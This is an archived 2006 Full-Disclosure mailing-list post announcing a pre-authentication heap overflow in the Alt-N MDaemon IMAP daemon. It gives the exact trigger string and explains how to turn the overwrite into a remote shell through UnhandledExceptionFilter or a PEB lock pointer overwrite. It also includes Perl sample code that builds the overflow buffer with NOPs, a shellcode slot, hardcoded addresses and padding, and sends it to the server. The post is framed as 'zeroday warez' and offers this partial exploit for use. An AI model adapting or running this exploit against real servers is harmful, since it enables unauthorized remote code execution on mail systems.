lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <4479A48E.60104@gmx.net>
Date: Sun May 28 14:24:38 2006
From: kingcope at gmx.net (kcope)
Subject: *zeroday warez* MDAEMON LATEST VERSION PREAUTH
 REMOTE ROOT HOLE *zeroday warez*

MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the 
PEB Lock) :)

Sample code:
 $where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
 #$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
 $what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
 
 $nops = "A" x 100;
 $a = $nops . $shellcode . ("Z" x 
(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x 
(0x184AC - 0x200A - 12));
 print $sock "a001 \"$a\r\n";
 close($sock);

Best Regards,
kcope

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ